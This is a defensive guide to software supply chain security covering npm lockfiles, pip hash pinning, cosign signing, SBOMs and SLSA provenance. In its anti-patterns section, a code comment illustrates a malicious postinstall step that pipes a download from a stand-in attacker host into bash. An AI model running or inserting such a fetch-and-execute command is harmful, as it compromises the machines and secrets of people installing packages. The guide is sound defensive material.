Software Supply Chain Security: npm, pip, and Beyond

TL;DR

• Bottom line: Secure your supply chain with lockfile pinning + hash verification, disable lifecycle scripts by default, scope private packages, generate SBOMs, and adopt SLSA provenance -- no single measure is sufficient alone.
• Key tool/command: npm ci --ignore-scripts for deterministic, script-safe installs; pip install --require-hashes -r requirements.txt for hash-verified Python installs.
• Watch out for: Dependency confusion attacks -- if your private packages are not scoped (@org/pkg) or reserved in public registries, attackers can publish higher-version packages with the same name to hijack installs.
• Works with: npm 7+, pip 8+, Go 1.13+ (modules), Sigstore/cosign 2.x, SLSA v1.0, CycloneDX 1.5+, SPDX 2.3+.

Constraints

• NEVER install packages without verifying integrity -- use lockfiles with hashes (package-lock.json, requirements.txt --require-hashes)
• NEVER run npm install in CI -- use npm ci which enforces lockfile integrity
• NEVER trust package lifecycle scripts by default -- disable with --ignore-scripts and allowlist explicitly
• Private package names MUST be scoped (@org/pkg) or reserved in public registries to prevent dependency confusion
• SBOM generation is required by US Executive Order 14028 for federal software suppliers

Quick Reference

Supply Chain Threat/Mitigation Matrix

Decision Tree

START: What is your primary supply chain concern?
├── Preventing malicious package installs?
│   ├── Using npm?
│   │   ├── YES → Pin versions + npm ci + --ignore-scripts + lockfile-lint
│   │   └── NO ↓
│   ├── Using pip/poetry?
│   │   ├── YES → pip-compile --generate-hashes + --require-hashes
│   │   └── NO ↓
│   └── Go/Cargo/other → Use native lockfile + checksum verification
│
├── Need artifact signing and verification?
│   ├── Container images?
│   │   ├── YES → Sigstore cosign sign + verify
│   │   └── NO ↓
│   └── npm packages → npm provenance (SLSA + Sigstore)
│
├── Need compliance (SLSA/NIST)?
│   ├── SLSA Level 1 → Generate provenance metadata
│   ├── SLSA Level 2 → Signed provenance from hosted CI
│   └── SLSA Level 3 → Isolated build + non-forgeable provenance
│
├── Need dependency inventory?
│   └── YES → Generate CycloneDX or SPDX SBOM in CI
│
└── DEFAULT → Start with lockfile pinning + npm audit + OpenSSF Scorecard

Step-by-Step Guide

1. Configure deterministic installs with lockfile enforcement

Use npm ci in CI/CD instead of npm install. It deletes node_modules/ and installs exactly what the lockfile specifies, failing on mismatch. [src4]

# .npmrc -- project-level configuration
ignore-scripts=true
engine-strict=true
package-lock=true
audit-level=moderate

# CI install command (never npm install)
npm ci --ignore-scripts

Verify: npm ci should exit 0 with no lockfile mismatch warnings. Run npm ls --all to confirm dependency tree matches lockfile.

2. Prevent dependency confusion with scoped packages

Configure npm to resolve private scopes from your internal registry, preventing public registry substitution. [src4]

# .npmrc -- scope-to-registry mapping
@mycompany:registry=https://npm.mycompany.com/
//npm.mycompany.com/:_authToken=${NPM_PRIVATE_TOKEN}
package-lock=true

Verify: npm config get @mycompany:registry should return your private registry URL.

3. Pin Python dependencies with hash verification

Use pip-compile (from pip-tools) to generate a requirements file with SHA256 hashes. [src5]

# Generate requirements.txt with hashes
pip-compile --generate-hashes --output-file=requirements.txt requirements.in

# Install with hash verification
pip install --require-hashes --no-deps -r requirements.txt

Verify: Modify any hash in requirements.txt -- pip install --require-hashes should fail with hash mismatch error.

4. Enable npm provenance with SLSA attestations

npm provenance uses Sigstore to cryptographically link published packages to their source repo and build. [src1]

# .github/workflows/publish.yml
name: Publish
on:
  release:
    types: [published]
permissions:
  contents: read
  id-token: write
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 20
          registry-url: https://registry.npmjs.org
      - run: npm ci
      - run: npm publish --provenance --access public
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}

Verify: npm audit signatures on the published package should show "verified registry signatures".

5. Sign and verify container images with cosign

Cosign provides keyless signing using OIDC identity from CI providers. No key management required. [src2]

# Sign a container image (keyless)
cosign sign ghcr.io/myorg/myapp:v1.2.3

# Verify a signed image
cosign verify \
  --certificate-identity=https://github.com/myorg/myapp/.github/workflows/build.yml@refs/tags/v1.2.3 \
  --certificate-oidc-issuer=https://token.actions.githubusercontent.com \
  ghcr.io/myorg/myapp:v1.2.3

Verify: cosign verify should print verification confirmation with no errors.

6. Generate SBOM with CycloneDX

Generate a Software Bill of Materials in CycloneDX format as part of your CI pipeline. [src8]

# npm: generate CycloneDX SBOM
npx @cyclonedx/cyclonedx-npm --output-file sbom.json

# Python: generate CycloneDX SBOM
pip install cyclonedx-bom
cyclonedx-py environment --output sbom.json

Verify: sbom.json should contain a components array listing all dependencies with version, purl, and hash information.

7. Evaluate dependencies with OpenSSF Scorecard

Run Scorecard against dependencies to assess their security posture before adoption. [src6]

# Score a specific repository
scorecard --repo=github.com/expressjs/express

Verify: Output should show scores (0-10) for checks like Branch-Protection, Signed-Releases, Token-Permissions, and Vulnerabilities.

Code Examples

npm: Complete .npmrc Security Configuration

# .npmrc -- project root (commit to repo)
package-lock=true
ignore-scripts=true
save-exact=true
audit-level=moderate
@mycompany:registry=https://npm.mycompany.com/
engine-strict=true

Python: Secure pip Configuration with Hash Pinning

# pip.conf
[global]
require-hashes = true
no-deps = true

[install]
index-url = https://pypi.org/simple/
extra-index-url =
trusted-host =

GitHub Actions: SLSA Provenance Generator

# .github/workflows/slsa-provenance.yml
name: SLSA Go Releaser
on:
  release:
    types: [published]
permissions: read-all
jobs:
  build:
    permissions:
      id-token: write
      contents: write
      actions: read
    uses: slsa-framework/slsa-github-generator/.github/workflows/[email protected]
    with:
      go-version: "1.22"

Kyverno: Enforce Cosign-Signed Images in Kubernetes

# Kyverno policy to enforce signed images
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: verify-image-signatures
spec:
  validationFailureAction: Enforce
  rules:
    - name: verify-cosign-signature
      match:
        any:
          - resources:
              kinds: ["Pod"]
      verifyImages:
        - imageReferences: ["ghcr.io/myorg/*"]
          attestors:
            - entries:
                - keyless:
                    subject: "https://github.com/myorg/*"
                    issuer: "https://token.actions.githubusercontent.com"

Anti-Patterns

Wrong: Using floating version ranges in production

// BAD -- ^ and ~ allow automatic minor/patch upgrades
// A compromised patch release gets installed automatically
{
  "dependencies": {
    "express": "^4.18.0",
    "lodash": "~4.17.0",
    "axios": "*"
  }
}

Correct: Pin exact versions with lockfile enforcement

// GOOD -- exact versions + npm ci enforces lockfile
{
  "dependencies": {
    "express": "4.18.2",
    "lodash": "4.17.21",
    "axios": "1.6.7"
  }
}

Wrong: Internal packages without scoping

// BAD -- unscoped private package name can be hijacked
// Attacker publishes "[email protected]" to public npm
{
  "name": "my-internal-utils",
  "version": "1.0.0"
}

Correct: Scoped packages with registry mapping

// GOOD -- scoped package with .npmrc registry mapping
{
  "name": "@mycompany/internal-utils",
  "version": "1.0.0",
  "private": true
}

Wrong: pip install without hash verification

# BAD -- no integrity verification
pip install requests flask sqlalchemy

Correct: Hash-pinned requirements with --require-hashes

# GOOD -- every package verified against pre-computed hash
pip install --require-hashes --no-deps -r requirements.txt

Wrong: Allowing all lifecycle scripts

# BAD -- postinstall scripts can execute arbitrary code
npm install some-package
# The package's postinstall script runs: curl attacker.com/steal | bash

Correct: Disabling scripts globally with explicit allowlist

# .npmrc -- disable scripts by default
ignore-scripts=true

Common Pitfalls

• Lockfile not committed to git: Without a committed lockfile, every npm install can resolve different versions. Fix: Always commit package-lock.json or poetry.lock. [src4]
• npm install in CI instead of npm ci: npm install can silently update the lockfile. Fix: Use npm ci in all CI/CD pipelines. [src4]
• Trusting provenance without verifying: npm provenance exists but is not checked by default. Fix: Run npm audit signatures after install. [src1]
• Ignoring transitive dependencies: Direct dependencies may be safe, but their dependencies can be compromised. Fix: Use npm ls --all or SBOM tools to audit the full tree. [src3]
• PyPI Trusted Publishers not configured: Using long-lived API tokens for publishing is less secure. Fix: Configure OIDC-based Trusted Publishers in PyPI project settings. [src5]
• No cooldown window before upgrading: Adopting new versions immediately exposes you to recently published malware. Fix: Wait 48-72 hours; use Dependabot/Renovate with delayed merge. [src7]
• SBOM generated once, never updated: Outdated SBOM cannot identify newly disclosed CVEs. Fix: Regenerate SBOM in every CI build; store alongside release artifacts. [src8]
• Scorecard checks ignored for new dependencies: Adding dependencies without checking posture introduces unvetted risk. Fix: Run scorecard --repo=<dep-repo> before adding. [src6]

Diagnostic Commands

# Audit npm packages for known vulnerabilities
npm audit

# Verify npm registry signatures (provenance)
npm audit signatures

# List full dependency tree
npm ls --all

# Validate lockfile integrity and registry sources
npx lockfile-lint --path package-lock.json --type npm --allowed-hosts npm --validate-https

# Check OpenSSF Scorecard for a dependency
scorecard --repo=github.com/expressjs/express --format=json

# Generate CycloneDX SBOM
npx @cyclonedx/cyclonedx-npm --output-file sbom.json

# Python: audit packages for vulnerabilities
pip-audit

# Verify container image signature with cosign
cosign verify --certificate-oidc-issuer=https://token.actions.githubusercontent.com \
  ghcr.io/myorg/myapp:latest

# Scan SBOM for vulnerabilities with grype
grype sbom:./sbom.json

Version History & Compatibility

When to Use / When Not to Use

Important Caveats

• SLSA provenance only proves WHERE software was built, not that the source code itself is safe -- combine with code review and vulnerability scanning
• Sigstore keyless signing relies on OIDC providers (GitHub, Google, Microsoft); if the OIDC provider is compromised, signatures can be forged
• npm --ignore-scripts breaks packages that require native compilation (node-gyp, sharp, bcrypt); maintain an explicit allowlist for these packages
• Hash-pinned requirements in Python do not prevent install-time code execution from setup.py; use --no-build-isolation cautiously
• OpenSSF Scorecard scores are heuristic, not guarantees -- a perfect 10 does not mean a package is free of vulnerabilities
• SBOM accuracy depends on the tool used; different generators may produce different component lists for the same project
• The npm "Shai Hulud" worm attack (September 2025) demonstrated that even with these defenses, zero-day supply chain attacks can propagate rapidly -- defense in depth is essential